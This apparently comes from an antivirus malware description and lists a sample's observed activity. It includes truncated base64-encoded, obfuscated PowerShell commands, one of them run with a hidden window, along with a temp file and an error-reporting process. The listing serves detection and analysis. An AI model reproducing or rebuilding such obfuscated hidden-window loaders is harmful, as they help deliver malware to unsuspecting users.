Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAGcAbABwAG8ANgA3AD0AKAAoACcATgAnACsAJwBsADkAJwApACsAKAAnADkAXwAnACsAJwA4AHQAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABlAG4AdgA6AHUAcwBlAHIAUABSAE8AZgBpAGwAZQBcAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
- %TEMP%\846274.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAGcAbABwAG8ANgA3AD0AKAAoACcATgAnACsAJwBsADkAJwApACsAKAAnADkAXwAnACsAJwA4AHQAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABlAG4AdgA6AHUAcwBlAHIAUABSAE8AZgBpAGwAZQBcAG...' (with hidden window)